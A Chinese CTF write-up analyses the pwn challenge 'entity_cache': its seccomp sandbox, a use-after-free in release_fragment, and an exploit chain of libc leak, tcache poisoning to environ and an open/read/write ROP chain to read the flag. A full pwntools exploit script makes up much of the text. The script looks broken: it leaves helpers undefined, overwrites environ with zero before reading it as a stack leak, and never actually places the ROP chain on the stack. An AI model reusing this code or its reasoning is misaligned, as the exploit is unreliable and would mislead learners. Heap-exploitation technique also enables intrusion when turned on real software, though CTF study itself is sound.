2025宁波网络安全大赛预赛PWN题：entity_cache 详细解析<\/h1>

题目基本情况<\/h2>

保护机制<\/h3>
Arch: amd64-64-little<\/li>
RELRO: Full RELRO<\/li>
Stack: Canary found<\/li>
NX: NX enabled<\/li>
PIE: PIE enabled<\/li>
Stripped: No<\/li> <\/ul>
沙箱限制<\/h3>
通过seccomp禁用execve系统调用：<\/p>
line  CODE  JT   JF      K
=================================
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x02 0xc000003e  if (A != ARCH_X86_64) goto 0004
0002: 0x20 0x00 0x00 0x00000000  A = sys_number
0003: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0005
0004: 0x06 0x00 0x00 0x00000000  return KILL
0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
<\/code><\/pre>
程序功能<\/h3>
程序提供5个选项：<\/p>

Inject Fragment - 申请内存并写入数据<\/li>
Override Fragment - 编辑已分配内存<\/li>
Purge Fragment - 释放内存<\/li>
Probe Fragment - 打印内存内容<\/li>
Abort Mission - 退出程序<\/li>
<\/ol>
漏洞分析<\/h2>
关键漏洞<\/h3>

UAF漏洞<\/strong>：在release_fragment<\/code>函数中释放内存后未清空指针<\/li>
PIE泄露<\/strong>：mission_init<\/code>函数泄露了sandbox<\/code>函数的地址<\/li>
堆管理缺陷<\/strong>：最大可分配0x500大小的chunk，可操作unsortedbin<\/li>
<\/ol>
逆向分析<\/h3>
main函数<\/h4>
int<\/span> __fastcall<\/span> main<\/span>(int<\/span> argc, const<\/span> char<\/span> **<\/span>argv, const<\/span> char<\/span> **<\/span>envp) {
<\/span><\/span>  \/\/ 初始化并泄露PIE地址
<\/span><\/span><\/span><\/span>  mission_init(argc, argv, envp);
<\/span><\/span>  \/\/ 设置沙箱
<\/span><\/span><\/span><\/span>  sandbox();
<\/span><\/span>  
<\/span><\/span>  while<\/span> (1<\/span>) {
<\/span><\/span>    mission_menu();
<\/span><\/span>    __isoc99_scanf("%d"<\/span>, &<\/span>v4);
<\/span><\/span>    getchar();
<\/span><\/span>    switch<\/span> (v4) {
<\/span><\/span>      case<\/span> 1<\/span>:<\/span> allocate_fragment(); break<\/span>;
<\/span><\/span>      case<\/span> 2<\/span>:<\/span> edit_fragment(); break<\/span>;
<\/span><\/span>      case<\/span> 3<\/span>:<\/span> release_fragment(); break<\/span>;
<\/span><\/span>      case<\/span> 4<\/span>:<\/span> inspect_fragment(); break<\/span>;
<\/span><\/span>      case<\/span> 5<\/span>:<\/span> return<\/span> 0<\/span>;
<\/span><\/span>      default<\/span>:<\/span> puts("[!] Invalid Operation Code."<\/span>); break<\/span>;
<\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>allocate_fragment函数<\/h4>
unsigned<\/span> __int64<\/span> allocate_fragment<\/span>() {
<\/span><\/span>  \/\/ 可申请最大0x500的内存
<\/span><\/span><\/span><\/span>  if<\/span> (size ><\/span> 0x500<\/span>) {
<\/span><\/span>    puts("[!] Invalid sector size."<\/span>);
<\/span><\/span>    exit(0<\/span>);
<\/span><\/span>  }
<\/span><\/span>  cache_size[idx] =<\/span> size;
<\/span><\/span>  cache[idx] =<\/span> malloc(size);
<\/span><\/span>  read(0<\/span>, (void<\/span> *<\/span>)cache[idx], cache_size[idx]);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>release_fragment函数<\/h4>
unsigned<\/span> __int64<\/span> release_fragment<\/span>() {
<\/span><\/span>  if<\/span> (idx <=<\/span> 9<\/span> &&<\/span> cache[idx]) {
<\/span><\/span>    free((void<\/span> *<\/span>)cache[idx]); \/\/ 指针未清空，UAF漏洞
<\/span><\/span><\/span><\/span>    puts("[ENTITY] Fragment purged from cache."<\/span>);
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用思路<\/h2>
步骤1：泄露libc地址<\/h3>

申请一个unsortedbin大小的chunk(如0x488)<\/li>
申请一个小chunk作为分隔(如0x38)<\/li>
释放第一个chunk，使其进入unsortedbin<\/li>
通过UAF读取fd指针，泄露main_arena地址<\/li>
<\/ol>
步骤2：确定libc版本<\/h3>

通过main_arena地址计算libc基址<\/li>
根据偏移确定libc版本(本题为2.27)<\/li>
<\/ul>
步骤3：tcache poisoning攻击<\/h3>

利用UAF修改tcache的fd指针<\/li>
将指针数组中的指针修改为environ变量地址<\/li>
读取environ变量获取栈地址<\/li>
<\/ol>
步骤4：ROP绕过沙箱<\/h3>

计算main函数返回地址在栈上的位置<\/li>
构造ROP链实现open\/read\/write系统调用<\/li>
通过ROP读取flag文件<\/li>
<\/ol>
完整利用代码(Python)<\/h2>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'amd64'<\/span>
<\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span>
<\/span><\/span>
<\/span><\/span># 辅助函数<\/span>
<\/span><\/span>def<\/span> cmd<\/span>(i, prompt=<\/span>b<\/span>"Select Operation Code: "<\/span>):
<\/span><\/span>    sla(prompt, i)
<\/span><\/span>
<\/span><\/span>def<\/span> add<\/span>(idx, size, ctx):
<\/span><\/span>    cmd('1'<\/span>)
<\/span><\/span>    sla(b<\/span>"id > "<\/span>, str(idx).<\/span>encode())
<\/span><\/span>    sla(b<\/span>"size > "<\/span>, str(size).<\/span>encode())
<\/span><\/span>    sla(b<\/span>"fragment > "<\/span>, ctx)
<\/span><\/span>
<\/span><\/span>def<\/span> edit<\/span>(idx, ctx):
<\/span><\/span>    cmd('2'<\/span>)
<\/span><\/span>    sla(b<\/span>"id > "<\/span>, str(idx).<\/span>encode())
<\/span><\/span>    sla(b<\/span>"stream > "<\/span>, ctx)
<\/span><\/span>
<\/span><\/span>def<\/span> dele<\/span>(idx):
<\/span><\/span>    cmd('3'<\/span>)
<\/span><\/span>    sla(b<\/span>"id > "<\/span>, str(idx).<\/span>encode())
<\/span><\/span>
<\/span><\/span>def<\/span> show<\/span>(idx):
<\/span><\/span>    cmd('4'<\/span>)
<\/span><\/span>    sla(b<\/span>"id > "<\/span>, str(idx).<\/span>encode())
<\/span><\/span>
<\/span><\/span># 泄露PIE地址<\/span>
<\/span><\/span>ru(b<\/span>"[DEBUG INFO] "<\/span>)
<\/span><\/span>pie_leak =<\/span> int(rl()[:-<\/span>1<\/span>], 16<\/span>)
<\/span><\/span>elf.<\/span>address =<\/span> pie_leak -<\/span> 0xa1a<\/span>
<\/span><\/span>success("pie_leak: "<\/span> +<\/span> hex(elf.<\/span>address))
<\/span><\/span>
<\/span><\/span># 泄露libc<\/span>
<\/span><\/span>add(0<\/span>, 0x488<\/span>, b<\/span>"1"<\/span>)
<\/span><\/span>add(1<\/span>, 0x38<\/span>, b<\/span>"2"<\/span>*<\/span>0x10<\/span>)
<\/span><\/span>dele(0<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>libc_leak =<\/span> u64(rl()[:-<\/span>1<\/span>].<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>))
<\/span><\/span>libc.<\/span>address =<\/span> libc_leak -<\/span> 0x3ebca0<\/span>  # 2.27偏移<\/span>
<\/span><\/span>success("libc_leak: "<\/span> +<\/span> hex(libc_leak))
<\/span><\/span>success("libc_base: "<\/span> +<\/span> hex(libc.<\/span>address))
<\/span><\/span>
<\/span><\/span># tcache poisoning<\/span>
<\/span><\/span>add(2<\/span>, 0x38<\/span>, b<\/span>"3"<\/span>*<\/span>0x10<\/span>)
<\/span><\/span>dele(2<\/span>)
<\/span><\/span>edit(2<\/span>, p64(libc.<\/span>sym.<\/span>environ))
<\/span><\/span>add(3<\/span>, 0x38<\/span>, b<\/span>"4"<\/span>*<\/span>0x10<\/span>)
<\/span><\/span>add(4<\/span>, 0x38<\/span>, p64(0<\/span>))
<\/span><\/span>
<\/span><\/span># 泄露栈地址<\/span>
<\/span><\/span>show(4<\/span>)
<\/span><\/span>stack_leak =<\/span> u64(rl()[:-<\/span>1<\/span>].<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>))
<\/span><\/span>ret_addr =<\/span> stack_leak -<\/span> 0xf0<\/span>
<\/span><\/span>success("stack_leak: "<\/span> +<\/span> hex(stack_leak))
<\/span><\/span>success("ret_addr: "<\/span> +<\/span> hex(ret_addr))
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>pop_rdi =<\/span> libc.<\/span>address +<\/span> 0x2155f<\/span>
<\/span><\/span>pop_rsi =<\/span> libc.<\/span>address +<\/span> 0x23e6a<\/span>
<\/span><\/span>pop_rdx =<\/span> libc.<\/span>address +<\/span> 0x1b96<\/span>
<\/span><\/span>pop_rax =<\/span> libc.<\/span>address +<\/span> 0x439c8<\/span>
<\/span><\/span>syscall =<\/span> libc.<\/span>address +<\/span> 0x128be9<\/span>
<\/span><\/span>
<\/span><\/span>rop =<\/span> flat([
<\/span><\/span>    pop_rdi, ret_addr +<\/span> 0x100<\/span>,  # flag路径地址<\/span>
<\/span><\/span>    pop_rsi, 0<\/span>,
<\/span><\/span>    pop_rax, 2<\/span>,
<\/span><\/span>    syscall,                    # open("flag", O_RDONLY)<\/span>
<\/span><\/span>    
<\/span><\/span>    pop_rdi, 3<\/span>,                # 假设返回的fd是3<\/span>
<\/span><\/span>    pop_rsi, ret_addr +<\/span> 0x200<\/span>, # 缓冲区<\/span>
<\/span><\/span>    pop_rdx, 0x100<\/span>,
<\/span><\/span>    pop_rax, 0<\/span>,
<\/span><\/span>    syscall,                   # read(fd, buf, 0x100)<\/span>
<\/span><\/span>    
<\/span><\/span>    pop_rdi, 1<\/span>,
<\/span><\/span>    pop_rsi, ret_addr +<\/span> 0x200<\/span>,
<\/span><\/span>    pop_rdx, 0x100<\/span>,
<\/span><\/span>    pop_rax, 1<\/span>,
<\/span><\/span>    syscall,                   # write(1, buf, 0x100)<\/span>
<\/span><\/span>    
<\/span><\/span>    b<\/span>".\/flag<\/span>\x00<\/span>"<\/span>
<\/span><\/span>])
<\/span><\/span>
<\/span><\/span># 劫持返回地址<\/span>
<\/span><\/span>add(5<\/span>, 0x500<\/span>, rop.<\/span>ljust(0x100<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>) +<\/span> p64(ret_addr))
<\/span><\/span>cmd('5'<\/span>)  # 触发ROP<\/span>
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>总结与关键点<\/h2>


信息泄露<\/strong>：<\/p>

利用PIE泄露计算基址<\/li>
通过unsortedbin泄露libc地址<\/li>
通过environ变量泄露栈地址<\/li>
<\/ul>
<\/li>

内存破坏<\/strong>：<\/p>

利用UAF实现tcache poisoning<\/li>
控制指针数组实现任意地址读写<\/li>
<\/ul>
<\/li>

绕过沙箱<\/strong>：<\/p>

构造ROP链实现文件操作<\/li>
使用open\/read\/write系统调用读取flag<\/li>
<\/ul>
<\/li>

注意事项<\/strong>：<\/p>

需要准确判断libc版本(本题为2.27)<\/li>
注意tcache的特性与操作方式<\/li>
计算栈偏移时要考虑环境差异<\/li>
<\/ul>
<\/li>
<\/ol>
通过这套利用链，可以成功绕过沙箱限制并读取flag文件。本题考察了堆漏洞利用、信息泄露、ROP构造等多个PWN题常见考点，是一道综合性较强的题目。<\/p>